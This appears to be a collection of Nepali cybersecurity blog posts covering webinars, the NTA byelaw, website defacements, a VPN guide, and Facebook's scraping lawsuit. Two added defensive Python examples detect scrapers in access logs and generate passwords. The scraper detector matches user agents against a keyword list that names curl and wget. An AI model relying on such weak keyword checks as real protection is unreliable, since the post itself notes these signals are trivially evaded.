The Center for Cyber Security Research and Innovation (CSRI) and the Information Security Response Team Nepal (npCERT) are set to jointly organize an international cybersecurity webinar.
The massive involvement and advancement in the Internet have certainly made lives easier in terms of online connectivity and communications. However, we must not forget the risks that come with it.
Furthermore, there have been many cybersecurity incidents across the country and the rest of the world during the pandemic. Given the growing cybersecurity threat in Nepal, it is important to discuss and implement strategies to tackle the challenges.
Events that bring together experts and organizations working in cybersecurity to form such a strategy are therefore very welcome.
Through this event, CSRI Nepal and npCERT will join hands to welcome cybersecurity experts to give their valuable insights.
The keynote topic for the event is – Cybersecurity for All: Learn How Hackers Can Access & Control Electronics Devices Remotely and How to Combat Such Cyber Attacks.
Webinar Details
Topic – International Webinar 2020: Strategies for National Cyber Security
Date – October 10, 2020
Start – 9 AM UTC+05:45
Venue – Zoom (webinar)
Keynote Speaker – Danda Bir Rawat, Ph.D., IET Fellow
Data breaches and security have been the hottest news in the tech and digital world recently! Every company today wants to assure its users of maximum data security. In line with this, Facebook has recently sued two firms for carrying out illegal data scraping on its platforms. The companies scraped data from Facebook and Instagram, both of which Facebook owns. Beyond Facebook, the firms also collected data from several other popular sites such as Twitter, YouTube, LinkedIn, and Amazon.
What is Data Scraping?
Data scraping is a method of collecting or extracting data from websites and apps using automation tools such as bots. It has become a craze in today's data-driven world. While a great deal of scraping is carried out innocuously, it can take an illegal turn if it is not taken seriously.
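Because scraping is carried out by automation, it leaves a recognizable footprint in a site's own access logs: one client requesting far more pages, far faster, than a person reading them would. The following added example (written for this page, not code from Facebook or the firms it names) parses web-server access-log lines in the Common Log Format and flags clients whose request rate, breadth of pages visited, or user agent string looks automated. The log lines are constructed for the example, the thresholds are arbitrary defaults, and the `/profile/` path prefix is an assumed convention for the pages being harvested.

```python
import re
from collections import defaultdict
from datetime import datetime

# Matches one Common Log Format line with referrer and user-agent fields.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Substrings typical of HTTP libraries and crawlers rather than browsers (illustrative list).
AUTOMATION_UA = ("python-requests", "scrapy", "curl/", "wget/", "httpclient")


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect_scrapers(lines, max_rate=30, window_s=60, min_distinct=20):
    """Return {client_ip: [reasons]} for clients whose behaviour looks automated."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    flagged = {}
    for ip, recs in by_ip.items():
        reasons = []
        recs.sort(key=lambda r: r["ts"])
        # Sliding window: the largest number of requests inside any window_s-second span.
        peak, start = 0, 0
        for end in range(len(recs)):
            while (recs[end]["ts"] - recs[start]["ts"]).total_seconds() > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > max_rate:
            reasons.append(f"{peak} requests within {window_s}s")
        # Breadth: a person rarely reads dozens of distinct profile pages in one session.
        distinct = {r["path"] for r in recs if r["path"].startswith("/profile/")}
        if len(distinct) >= min_distinct:
            reasons.append(f"{len(distinct)} distinct profile pages")
        ua = recs[0]["ua"].lower()
        if any(tag in ua for tag in AUTOMATION_UA):
            reasons.append(f"automation user agent: {recs[0]['ua']}")
        if reasons:
            flagged[ip] = reasons
    return flagged


def _line(ip, second, path, ua):
    """Build one constructed log line at 09:00:<second> on a fixed date."""
    ts = f"10/Oct/2020:09:00:{second:02d} +0545"
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" 200 512 "-" "{ua}"'


BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0) Chrome/85.0"
BOT_UA = "python-requests/2.24.0"
# Constructed sample traffic: one person viewing six profiles over a minute,
# one scraper pulling forty profiles in forty seconds with a library user agent.
SAMPLE_LOG = (
    [_line("198.51.100.7", s, f"/profile/{1000 + i}", BROWSER_UA)
     for i, s in enumerate(range(0, 56, 11))]
    + [_line("203.0.113.5", i, f"/profile/{2000 + i}", BOT_UA) for i in range(40)]
)

if __name__ == "__main__":
    for ip, reasons in detect_scrapers(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

Each signal on its own is weak (a shared office NAT can be busy, and user agents are trivially changed), so the function reports every reason that fired and lets the operator decide whether to rate-limit or block; that is also why the thresholds are parameters rather than constants.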
Reportedly, the companies used the data collected from the unauthorized scraping for Digital Marketing purposes. Facebook claimed that it was against the privacy policies of the company.
The two firms that violated the social media giant's privacy policy are the Israel-based BrandTotal Limited and the Delaware-based Unimania Inc. According to Facebook, the companies scraped the data using browser extensions named 'UPVoice' and 'Ads Feed'.
Meanwhile, Facebook has been extra careful when it comes to data security after the scandalous Cambridge Analytica incident. The legal actions taken by Facebook have dramatically increased since then.
A Snippet from Facebook Statement:
“Today, we filed a lawsuit in the US against two companies that used scraping to engage in an international data harvesting operation. These companies scraped data from Facebook, Instagram, Twitter, YouTube, LinkedIn, and Amazon, in order to sell “marketing intelligence” and other services. The actions of BrandTotal Ltd., an Israeli-based company, and Unimania Inc., incorporated in Delaware, violate our Terms of Service and we are pursuing legal action to protect our users.”
For Facebook's detailed official statement on the matter, visit here.
This action by Facebook is a welcome move in the digital world! Following suit, other companies and tech giants need to buckle up in how they respond to grave issues like these. Cybercrime is at an all-time high, and it is the need of the hour to treat data security with the utmost care and vigilance.
Finally, Kudos to Facebook from our team!
Meanwhile, what do you make of these recent steps by tech companies? Do write down your concerns in the comment section below.
A Bangladeshi Hacker has defaced the website of GEMS School, Lalitpur for presently unknown reasons.
The defaced website displays a page with the hacker's alias 'Evil Attacker'. The hacker(s) have also included a link to their Facebook handle.
‘Evil Attacker’ has publicly posted some of his recent works including the defacement of Indian websites.
In fact, there is a YouTube link for a hacking tutorial in which the hacker teaches how to hack a website without any Username and Password.
As of now, the hacker hasn’t opened up about the intention behind the mass defacement. We suspect that it’s just for fun judging by Facebook posts and comments.
[Update: The website (www.gems.edu.np) has been restored.]
Can it be just for fun or is there a greater reason behind this?
Using a VPN has become a necessity when it comes to surfing the internet securely. In fact, it isn’t only about getting access to some restricted sites as most people would think. From securing online identity to preventing data theft, a good VPN can make all the difference. In this article, we take a closer look at how to use a VPN on Windows and how to choose a good one.
If you are not using an ad blocker, you will know that clicking anywhere on a torrent site can redirect you to some other website.
That is where a VPN can help you download torrents more safely.
However, it is important to note that not every VPN delivers a satisfactory experience.
How to choose the right VPN?
Choosing the right VPN can make all the difference in your experience. Moreover, you have to make sure that the VPN you go with meets your requirements.
Let’s talk about what you should look for.
Ease of use – Not all of us are tech-savvy. Fortunately, most VPNs are easy to use with the option of connecting to a server within a few clicks. However, making sure of all the features is always better.
Security – All VPNs provide security at some level, but also think about the fallback. If the VPN connection drops, does the app provide a kill switch that blocks all traffic until the tunnel is back up?
Usage – As much as we hate to say it, not every VPN lets you do what you want. There can be restrictions on what content is available and in which country.
Logs – Imagine browsing in a private window, opening the history, and finding every site you visited listed there. You wouldn't want that from your VPN either. Check what logs the provider keeps; if you are comfortable with its logging policy, it shouldn't be a worry.
Pricing – The price tag on a VPN plays a huge role in deciding whether to go for it. There are also some brilliant options at affordable rates. Make sure to check out the long term plans or any special offers.
Free vs Paid VPN: What to choose?
All great things come at a price. So does VPN. Paid VPNs are better in terms of quality of service and level of security.
Besides that, there are more features and settings to enhance your internet surfing experience. Furthermore, paid VPNs are ads-free.
There are a few decent free alternatives that give you exactly what you need. However, free VPNs often have limitations in customer service, security, and server locations.
So, if you are serious about your online privacy and want to maintain anonymity, you should opt for a paid service.
How to use a VPN on Windows: Getting Started
Most of the time using a VPN is straightforward whether it’s on Windows, iOS, or Android. All you have to do is:
Download and install the VPN
Set up the VPN and adjust a few settings
Connect to a VPN server
That’s about it!
You can find the download button or link on an official website. Then, you can double-click the downloaded file to get started with the installation.
Image: Surfshark
When the installation is complete, open the application and wait for it to start. Some applications start automatically after installation, depending on your Windows settings.
Here comes the part that separates a free and a paid VPN!
You need to log in if you have an active subscription to the VPN. If not, there might be limited features to use for free.
Upgrading to the premium version is always an option.
To do that, you can sign up or create an account.
Some VPNs such as Surfshark offer two-factor authentication, which is always better in terms of account security.
When you have created an account and logged in, simply tap Connect or whatever the button on the screen says. If the connection is successful, VPNs usually show a ‘connected’ status.
To disconnect, simply click on the Disconnect button.
Choosing a VPN Server
By now you probably have learned how to use a VPN. However, tapping Connect would normally connect you to a default server location.
Look for a menu option that allows you to choose a server location. Some VPNs have an option to choose from the Fastest or the Nearest server.
However, you can choose from many countries. For example, Surfshark has over 1700 servers in 63+ countries. Meanwhile, ExpressVPN offers 160 server locations in 94 countries, as of now.
Talking about managing server locations, most VPNs have a feature to bookmark your favorite locations.
Connecting to these locations requires just a single tap. And, the same goes for disconnecting!
Managing VPN Settings and Features
It is important to make sure you are aware of the settings and features of your subscription. In fact, you can do much more than just change your password from the settings.
You have options such as:
Update your subscription plan
Earn by referral (depending on the service provider)
Change the app language
Configure auto-connect, notifications, and the kill switch
Enable dark mode (not all VPNs have this option)
Besides these, there are advanced settings that you can configure if you know your way around them. Otherwise, we recommend leaving the advanced settings alone.
Let’s also talk about some features that VPNs usually provide while we are at it.
Paid VPNs in particular let you choose which apps or sites to exclude from the VPN connection. You might not want to browse some of your favorite social media apps through a VPN.
Similarly, there are features that, when enabled, block potentially dangerous ads and malware. Some VPNs also send a real-time notification when your credentials are at risk of being compromised.
What we recommend
It’s definitely Surfshark that comes on top for me. Other VPNs such as ExpressVPN and Nord might have impressive security features but I think Surfshark comes at an affordable rate for what it offers.
The interface of this VPN service on Windows is quite clean and easy to navigate through. The feature that impressed me is the CleanWeb that blocks ads and malicious sites automatically.
There are so many security vulnerabilities that you can be exposed to on the web, especially on Windows. I found that Surfshark has answers to all of that.
Now is the era of digital transformation! From small businesses to large enterprises, every sector today depends on technology. Since the global COVID-19 pandemic hit the world at the end of 2019, starting from the Chinese province of Wuhan, dependence on technology and digital infrastructure has become indispensable. In this article, we look at the changes the pandemic has brought to the digital domain and how they should be dealt with. The pandemic is still with us and, according to experts, will stay with us for a long time. So, let's dive deeper into the topic by discussing digital risk management, which has become mandatory in today's time and space.
First, let’s learn in detail about the concepts and definitions of digital risks, its types, and other important aspects related to it.
What is Digital Risk?
Digital risks are the actions or events that can cause damage to the computers, hardware, software, data, and information in a digital domain. Every business or organization is today susceptible to attacks and threats. Every now and then we are hearing about the hackers and cybercriminals attacking and manipulating the data and information they get their hands on.
Types of Digital Risk:
Cybersecurity Risk
Compliance Risk
Workforce Risk
Third-party risk
Data Privacy Risk
Resilience Risk
Automation Risk
Digital Risk Management:
Digital risk management is an essential part of business management. Managing digital risk means understanding the loopholes in the business or organization and carrying out the actions necessary to minimize their effect on the business.
Steps of digital risk management:
Identifying critical/vulnerable business assets: First, an organization needs to know which assets (data, information, etc.) are vulnerable. This paves the way for the further steps.
Identifying potential threats: After knowing the vulnerable aspects of the business, it is important to analyse what threats and risks might affect those vulnerable aspects.
Monitoring for unwanted exposure: In this step, the organization should take various measures to find out whether its data and business assets are exposed to unwanted outside parties. If they are exposed and prone to attack, final actions need to be taken.
Taking necessary actions: This is the final step in digital risk management. The necessary steps to protect the data and information should be taken in this step. The companies should carry out various mitigating measures. The mitigating measures include:
Tactical Mitigations
Operational Mitigations
Strategic Mitigations
Now, let’s talk about the current pandemic scenario and how digital risk management needs to be strengthened even more today.
Pandemic and Digital Risk:
After the pandemic hit globally, organizations and enterprises started to rely heavily on technology. It is great that technology has been incorporated into various aspects of society, but rampant adoption without any risk and threat assessment has made organizations and companies even more vulnerable. Time and again, we hear of hackers and attackers becoming more pervasive than ever before.
This has definitely shifted the risk to the digital domain today. It is a great task for the organization to manage data security and other various threats.
Industries at risk:
Banking/Financial Institutions
Healthcare
Manufacturing
Pharmaceutical sectors
Educational Institutions
The listed industries, and many more, lack proper security today. In the pharmaceutical industry, attacks could be even more rampant considering the worldwide race and competition to develop the right vaccine for the virus.
Let’s consider an example of the banking sector which is currently among the most vulnerable businesses.
Online banking and electronic transactions have evolved rapidly in recent months. The shift has accelerated at a very fast pace due to the pandemic. But are these things being done correctly? When the pandemic hit the banking sector, the only goal was to keep the business running. Because of that necessity, proper risk assessment and mitigating measures were not carried out; the banks simply jumped on the bandwagon. This can definitely have a negative impact. For effective risk management, they need to change their framework.
How to make digital systems resilient in the times of pandemic?
Organizations should be aware that attacks can happen at any time.
They need to plan accordingly for the unexpected.
End users are being attacked in their homes. They need to take care of that. Phishing attacks are increasing.
Organizations should adopt digital risk management. In these unprecedented times, the following steps have become a necessity. Let's look at them in detail.
How to identify digital risk?
Perform a routine risk assessment to understand where the company/organization stands
Implement new technology with risk management in mind
Take care of the data privacy of employees
Address employees' concerns, since working remotely puts them at risk
Safeguard the overall cybersecurity ecosystem
Today the workplace isn’t just centrally located in a building; today everyone is working from home. So, the companies need to evaluate the risks in the employees’ network too.
What steps do the organizations need to take?
Companies should provide their own laptops and PCs with security settings configured
Work-from-home employees should be trained, something that has long been neglected
Cybersecurity awareness should be provided to employees
Employees should be made aware of potential threats through phishing simulations
What lies ahead?
It seems the pandemic is going to be with us for a fairly long time. Meanwhile, work from home has become a culture, and remote employment will certainly continue in the future even after the COVID-19 pandemic starts to fade away. So, it is an utmost need of today to think about digital risks and carry out the necessary evaluations and assessments in full swing.
The heavily digitally empowered industries today are the more vulnerable ones and they should come up with the best ideas and measures to ensure that security is maintained. Similarly, cybersecurity or more precisely the digital community as a whole needs to come together in these dire times to find out the best solutions to the problems at hand.
Meanwhile, let us know what needs to be done to ensure digital security in the current scenario in the comments below.
Author: Suman Thapaliya
Head of IT Department
Texas College of Management and IT
Did you know that your browser has a built-in password generating feature? Well, data security has become a major challenge across the globe. In this article, we will look at how to generate a strong password through browsers such as Mozilla Firefox and Google Chrome.
First, let us give you an idea of why you need a strong and secure password.
Most of us have a habit of using the same password across all of our accounts. That may be convenient for remembering the password but that can also become a potential threat.
How?
What if somebody gets through to one of your accounts and steals your password? They will have access to all of your accounts.
This is a very bad practice in terms of data and information security online.
What exactly is a Strong Password?
There is a basic measure of password strength. A strong password includes a mix of uppercase and lowercase letters, numbers, and special characters. Length is another parameter when measuring your password strength.
Furthermore, it is not recommended to use your personal info in the password, for instance, your first name or mobile number.
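The rules above (mixed character classes, sufficient length, no personal information) are simple enough to write down as code. The following added example, which is not from the article or from any browser's password manager, generates a password from the operating system's cryptographically secure random source with Python's `secrets` module and checks any candidate against those same rules. The 12-character minimum, the symbol set and the sample personal details are the example's own assumptions, not values from the article.

```python
import math
import secrets
import string

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits
SYMBOLS = "!@#$%^&*()-_=+[]{};:,.?"   # assumed symbol set for this example
ALPHABET = UPPER + LOWER + DIGITS + SYMBOLS


def check_password(pw, personal_info=(), min_length=12):
    """Apply the article's rules to a candidate password.

    Returns a dict with one boolean per rule plus an overall 'ok' flag, so a
    caller can tell the user exactly which rule a weak password fails.
    """
    lowered = pw.lower()
    checks = {
        "length": len(pw) >= min_length,
        "uppercase": any(c in UPPER for c in pw),
        "lowercase": any(c in LOWER for c in pw),
        "digit": any(c in DIGITS for c in pw),
        "symbol": any(c in SYMBOLS for c in pw),
        # Reject passwords containing a name, phone number, etc. (3+ chars, case-insensitive).
        "no_personal_info": not any(
            info.lower() in lowered for info in personal_info if len(info) >= 3
        ),
    }
    checks["ok"] = all(checks.values())
    return checks


def generate_password(length=16):
    """Generate a random password that satisfies every rule in check_password().

    secrets.choice() draws from the OS CSPRNG; the random module would not be
    suitable here because its output is predictable.
    """
    if length < 12:
        raise ValueError("use at least 12 characters")
    while True:
        pw = "".join(secrets.choice(ALPHABET) for _ in range(length))
        # Rejection sampling: retry until every character class is present.
        if check_password(pw)["ok"]:
            return pw


def entropy_bits(length, alphabet_size=len(ALPHABET)):
    """Entropy of a uniformly random password: length * log2(alphabet size)."""
    return length * math.log2(alphabet_size)


if __name__ == "__main__":
    # Constructed personal details for the demonstration.
    weak = check_password("Ram1990", personal_info=("Ram", "9841000000"))
    print("Ram1990 ->", {k: v for k, v in weak.items() if not v})
    pw = generate_password(16)
    print("generated:", pw, f"({entropy_bits(16):.0f} bits)")
```

The generator uses rejection sampling rather than forcing one character from each class into fixed positions, so every accepted password is still uniformly random over the passwords that pass the check; for a 16-character password from this 85-symbol alphabet that is roughly 100 bits of entropy, far beyond what an online guessing attack could exhaust.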
While we are at it, let’s also talk about remembering the password. Have you ever forgotten your password, be it for Gmail or Facebook, or any account that you use?
Honestly, we have all been there.
However, our browsers also have a store for all of your login information, including passwords, but only if you allow it.
How to Generate Strong Password in Google Chrome?
In case you didn’t know, Google Chrome has a password store and synchronization feature. Similarly, it has a built-in password manager that allows you to save and view your passwords.
You can also use it to generate strong passwords when signing up for any website or web app.
In fact, you don’t have to do anything!
Here’s how to create and use a secure and strong password in Google Chrome:
1. Visit the website on which you want to create an account.
2. Go to the sign-up form and fill in the required information.
3. Click on the password field and a password suggestion will be prompted.
4. Tap or click on the suggested password to use it. You can also copy it and store it in a safe location.
However, when you select the suggested password, Google Chrome automatically saves it for you. It syncs the password with your Google account.
Disclaimer: Password Syncing is a default Chrome feature. However, you can choose to enable or disable it from Chrome’s settings.
When you log in to the Chrome browser on another device, you can find the password saved in Chrome’s settings.
Or, you can access your saved passwords by entering: chrome://settings/passwords.
How to Generate Strong Password in Firefox?
Firefox has a similar feature for generating and saving passwords. The password manager in Firefox is called Firefox Lockwise.
The process for generating a strong password in Firefox is the same as in Google Chrome. So, we are not going to waste your time by repeating the process since it is very simple.
But we will show you how to allow Firefox to save the entered password.
When you sign in to or sign up for a new account, Firefox will show a prompt next to the address bar.
By clicking on Update, you can allow Firefox to save your password so that you won’t have to remember or enter it again.
To access Firefox Lockwise, click on the hamburger menu on the top-right corner of your browser. Then, click on Logins and Passwords.
Or, enter about:logins in the address bar.
Recently, Nepal Telecommunications Authority (NTA) issued the Cyber Security Byelaw, 2077 (2020). The objective of this byelaw was to meet cybersecurity standards and show best practices to protect IT infrastructure from various malicious attacks and threats.
Similarly, this document is expected to build trust and confidence of users towards using ICT technology and services of NTA.
On 11th September 2020, the Information Security Response Team Nepal (npCert) and the Center For Cyber Security Research and Innovation (CSRI) jointly hosted an open discussion on the topic "Multi Stakeholders Discussion on NTA Cyber Security Byelaw, 2077".
Suresh Bhandari, Program Coordinator and Director at npCERT welcomed panelists and participants with his opening remarks.
The panelists for the discussion were:
Bijay Kumar Roy – Director at Monitoring Division, NTA
Shubha Kayastha – Co-founder/Executive Director at Body & Data
Binay Bohora – MD at Vianet
Binita Shrestha – Manager at NTC
Yasmine Bhattarai – Unit Head at Ncell
The panel discussion was moderated by Chiranjibi Adhikari, President of npCERT.
Discussions, Questions, and Way Forward
Bijay Kumar Roy thanked npCERT for taking the initiative to conduct a discussion on the recently issued byelaw, since it is important to clear up any confusion.
He went on to explain the role of NTA to bridge the gap due to the digital divide in the country.
Vivek Rana, npCERT advisor and keynote speaker for the discussion gave an insight into the byelaw and its importance through a presentation.
One of the takeaways from his presentation was the need to keep IT and security separate. Since IT creates value and cybersecurity protects value, Vivek Rana suggests not merging these terms.
“Defending is attacking in reverse,” he finished his presentation by reflecting on the importance of defense.
Shubha Kayastha was the first to raise a question regarding the byelaw. She asked what will govern other service providers if the byelaw applies only to licensees.
Picking up on a point from the byelaw, she said that anonymizing data is not enough: it can still be used against the person, making it a potential threat.
On the other hand, panelist Binay Bohra feels that the byelaw has become a bit too granular. He said it should have defined a perimeter and allowed ISPs to carry out their operations within it.
Compliance requires time
Panelist Binita Shrestha said that NTC will be working to meet these compliances by breaking them down in phases. “However, we will need some time and prerequisites by coordinating with NTA”, she said.
Likewise, Yasmine Bhattarai explained that it took intensive meetings and discussions with stakeholders to prepare this document. She also agrees that this byelaw needs more time and work to achieve full compliance. She stressed building a road map, based on a study of the organization's structure, to comply quickly and effectively.
Panelist Bijay Kumar Roy seemed ecstatic about how fast this byelaw is gaining momentum and support from the service providers. Since he is a leading person behind this byelaw, he said that discussing and debating the points will only help to improve it.
“I urge everyone to try and comply with it so that we can gradually make revisions if needed”, he said.
In case you missed the discussion, follow this link.
Visa, the global payments technology company, has launched a new roadmap that sets the direction for payment security in Nepal for 2021 and beyond. Today, as people prefer making payments through devices like smartphones and laptops, and with a number of new users entering the payments ecosystem, Visa's undertaking is both timely and relevant in helping Nepal embrace digital payments with confidence.
Launching the Visa Future of Security Roadmap, Visa’s Head of Risk for the Asia Pacific, Joe Cunningham said, “The global pandemic has driven more consumers and businesses to adopt digital commerce. As people try digital payments for the first time, whether it is paying for online purchases or paying with a contactless card at a store, it is important that the experience is convenient, fast, and secure. Payment security is Visa’s top priority and having a set of common goals for the industry is crucial to helping build long-term trust in digital payments.
“Visa’s Future of Security Roadmap for Nepal will elevate the local industry to meet global standards and best practices. We appreciate the collaboration with all of our partners and believe that our shared vision will promote the greater use of digital payments in the coming years.”
Globally, Visa has successfully prevented $25 billion in annual fraud by using artificial intelligence (AI), making the global payment ecosystem safer for retailers and consumers. It has kept global fraud rates at historic lows—less than 0.1 percent—through a multi-layered approach of investing in human intelligence and technology; empowering consumers and clients with tools, resources, and control to manage risk; and setting governance processes to help businesses and regulators stay nimble.
Commenting on the launch, TR Ramachandran, Group Country Manager, India, and South Asia, Visa said, “Security of consumer and payment data has always been the highest priority for Visa. Building this trust at a time when new consumers and businesses are going digital is a shared responsibility between payment networks, consumers, banks, and the government.
New technology brings new ways to pay as well as new and unique risks, and to stay ahead of fraud, we need to work together and invest in security the same way we invest in innovations and consumer experience. We are proud to launch the Nepal Future of Security Roadmap as the groundwork to achieve this balance between security and experience.”
While Visa’s Roadmap focuses on a number of initiatives which will enable security to evolve at the same pace as the technologies – like EMV® 3-D Secure and tokenization – changing the way we pay, the core tenets of the roadmap include:
Devalue data by removing sensitive payment data from the ecosystem and making stolen account details useless
Protect data by implementing safeguards to protect personal data as well as account details
Harness data by identifying potential fraud before it occurs and increase confidence in approving good transactions
Empower everyone, including account holders and merchants, to play an active role in securing payments
Visa works with industry stakeholders including financial institutions, merchants, policymakers, law enforcement, and accountholders to secure payments. The Visa Future of Security Roadmap is the product of comprehensive consultation and collaboration, making it an authoritative document on Nepal payment security. Visa is delivering roadmaps around the world to ensure the security of the global commerce ecosystem, as well as working with Nepal industry bodies to align security initiatives.
In today's digital era, owning data and information brings not only technological but also financial gain. The terms cybersecurity, cyber law, and hacking are not new in today's world. Many people are well attuned to the digital world. From paying bills to making phone calls or storing important documents electronically, digital platforms have become a much more convenient option. As the platforms gain importance, threats induced by cybercrime have also affected a wide range of public and private organizations. The servers and data centers of such organizations are highly prone to cyberattacks.
Any individual or organization could be an easy target for hackers. Therefore, it has become more important to protect information systems and infrastructure from hackers by implementing cybersecurity best practices and enforcing cybersecurity laws. The Government of Nepal has implemented cyber laws such as the Electronic Transaction Act, 2063, and other cyber-related acts and laws, such as the National Cyber Security Policy 2016 and the IT Bill 2018, are in the process of amendment. Recently, the Nepal Telecommunications Authority (NTA) launched the Cyber Security Bylaw, 2077 (2020), which sets cybersecurity standards and best practices to protect IT infrastructure from malicious attacks and threats, with the aim of building users' trust and confidence in ICT technology and the services of NTA.
This week, on 11th September 2020, the Information Security Response Team Nepal (npCert) and the Center For Cyber Security Research and Innovation (CSRI) jointly hosted an open discussion on the topic "Multi Stakeholders Discussion on NTA Cyber Security Byelaw, 2077".
Nepal Telecommunications Authority (NTA) has issued Cyber Security ByeLaw 2077, requiring service providers to conduct mandatory security audits.
The new regulations make mobile and internet service providers responsible for cybersecurity. Experts have praised the efforts of NTA to issue the regulations, especially when cyber threats are on an increasing trend.
The ByeLaw provides that service providers must protect customers’ data. Likewise, they should inform the NTA in case of a cyberattack and prevent it.
Director of NTA Min Prasad Aryal says that these regulations help to tackle the increasing cyber threats resulting from the rise in online usage. "Schools, businesses, and other activities have already shifted online and with the increase in internet usage, we can't ignore the possibilities of misuse. Therefore, NTA issued this ByeLaw to prevent misuse, criminal, and fraudulent activities," says Director Aryal.
He further adds that the ByeLaw will assist all the mobile and internet service providers licensed by the NTA to make proper policies, manage the workforce and business plans.
Moreover, the bye-law contains items to be checked in an IS Audit, which the service providers will have to report to the NTA.
The Cyber Security ByeLaw covers General Security Standards and Practice, Data Security and Privacy, Information Systems Audit, Cloud Security, Infrastructure and Network Security, Core Security Systems, Application Security, Incident Response, In-House Security Issues including Capacity Building.
“The primary objective of these regulations is to protect consumers’ privacy in compliance with international standards and practice. Also, we hope that it will strengthen the system architecture preventing any unwanted breach of data,” adds Director Aryal.
Furthermore, he said that action would be taken against the companies that did not implement the new regulations as per the Telecommunications Act.
The new bye-law clearly points towards NTA’s growing concern for security. We hope that these regulations strengthen the situation of cybersecurity in Nepal.
What do you think about the new cybersecurity regulations?
The Center For Cyber Security Research and Innovation (CSRI) and the Information Security Response Team Nepal (npCert), in association with the Nepal Telecommunications Authority, CAN Federation, and the CSIT Association of Nepal, have successfully hosted a webinar titled 'Cyber Security Context in Nepal'.
The webinar covered discussions on the past, present, and future context of cybersecurity in Nepal with a major focus to shed light on the way forward in this domain.
The webinar started off with opening remarks by the President of CSRI, Prof. Dr. Subarna Shakya. Similarly, the Immediate Past President of CSRI and President of npCERT, Chiranjibi Adhikari welcomed the esteemed organizers, resource person, and all the participants.
Speaker/Resource Person for the Webinar
Mr. Narayan Koirala was the resource person/speaker for this event. He is a pioneer in the cybersecurity field and has been actively working to uplift the quality and standard of cybersecurity in Nepal.
By qualification and profession, Mr. Koirala is a Software Engineer and Cyber Defense Enthusiast. He is also the Founder/Director of Eminence Ways Pvt. Ltd., a dedicated Cybersecurity company headquartered in Nepal.
He started his presentation on the Past / Present / Future context of cybersecurity in Nepal by introducing the pillars of cybersecurity – People, Process, and Technology.
He presented in-depth material in a way that both the technical and non-technical audiences in the webinar could easily follow.
Narayan Koirala explained how cybersecurity threats rise alongside advances in technology. With the pandemic compelling people to use technology daily in their personal lives, the attack surface available to threat actors has grown.
His presentation highlighted the areas where we, as users, fall short in securing our data and privacy. On the other hand, poor execution of cybersecurity processes and policies has not made it attractive for companies to invest in the domain.
There are major cyber threats surrounding us that we need to be both aware of and prepared for. Some of them are targeted ransomware attacks, mobile malware, API-level attacks, misinformation, deepfakes, and several remote-working security threats.
The Way Forward
Mr. Koirala also gave his insights and opinions on the way forward in the cyber defense realm. Directives, guidelines, and policies always come first. He suggests that the governance in cybersecurity should be strengthened. Likewise, it is equally important to enhance incident response capabilities among other strategies.
Finally, the resource person Narayan Koirala warned about the increasing threat to people (users). He predicts that the prime target of cyberattacks will be the users. Therefore, educating and training them is crucial to safeguarding both personal and enterprise security.
Center For Cyber Security Research and Innovation (CSRI) and Information Security Response Team Nepal (npCert), in association with Nepal Telecommunications Authority and CAN Federation, are all set to host the webinar ‘Cyber Security Context in Nepal (Past / Present / Way Forward)’ on September 1st, 2020 (Tuesday) from 3 PM to 5 PM.
Zoom ID: 93123363895
Password: 482062
Speaker Details:
Mr. Narayan Koirala is a Software Engineer and Cyber Defense Enthusiast. He is the Founder/Director of Eminence Ways Pvt. Ltd., a dedicated Cybersecurity Company headquartered in Nepal. He is a pioneer in the field of Cyber Security and has been continuously working to uplift the field of IT security in Nepal.
Mr. Koirala has extensive experience in resolving Cyber Security issues of Major Financial Institutions, Government Bodies, and Private Companies, both at the national and international levels. During his career spanning more than a decade in cybersecurity, Mr. Koirala has witnessed how an organization’s less prioritized data security could face severe problems in the long run. His company, employing more than 35 professionals, has been consistently working to identify IT vulnerabilities and has helped organizations become secure by minimizing IT threats.
Mr. Koirala is also engaged in uplifting various cybersecurity, tech, and entrepreneur communities in Nepal. He encourages people to practice Cyber Hygiene and to secure their personal tech assets, which he believes will eventually lead to more secure organizations. He also counsels people from their early school days to be ethical and practice white-hat culture.
Mr. Koirala has been featured in numerous National and International Media and shared his thoughts about rising cybercrime and prevention in various conferences/ events. His articles about Cyber Hygiene and Data Security in the fast-paced technological advancement are being followed by many individuals and organizations.
Mr. Koirala holds a Bachelor’s degree in Software Engineering along with an MBA. He is also a certified ISO 27001:2013 Auditor and a certified CISCO CCNA CyberOps professional. Besides, he is associated with the Nepalese Young Entrepreneurs’ Forum (NYEF), Lions Club International, and CAN Federation.
A group of Indian hackers called Indian Cyber Troops have defaced the website of Nepal Press Union.
The website prompts a dialogue box saying ‘Justice for Nirmala Panta’.
Earlier the same group of hackers had defaced the website of the Supreme Court Bar Association for the same reason.
It looks like the Indian Cyber Troops have taken interest in the unsolved case of Nirmala Panta. The defaced website shows a picture of Nirmala Panta, who was raped and murdered.
The website also says “750+ days Still Nepal Government is silent”. It is clear that the objective of this defacement is to draw attention to the delay in the case and to seek justice for Nirmala Panta.
The website of the Public Procurement Monitoring Office (PPMO), bolpatra.gov.np, was hacked while evaluating the bids for the disputed railway construction contract.
According to a notice issued by the office, they were unable to download documents due to technical problems in their system.
Thus, the office has postponed the evaluation process for the bids opened from Shrawan 24 to 28.
Furthermore, data recovery is still uncertain, which means they might need to open another tender.
The office has also asked that all bidding processes be postponed until further notice. For tenders invited within that period whose deadline had not yet passed, the office has asked that any newly uploaded documents be uploaded again.
The office has also stated that the system manager will facilitate the submission of such application forms, and that the manager will be responsible for fixing the opening date if the affected public body requests it.
Bidders are also affected by this issue. Bidders who registered in the bidding system within the five-day period have to update their registration. Moreover, if the final bid submission period falls within that window, they have to re-upload their documents even if they had already submitted them.
Image: bolpatra.gov.np (Snapshot)
Due to the technical issue on the system, the office has fixed the last date for submission or opening of the bidding from 13th to 18th of September.
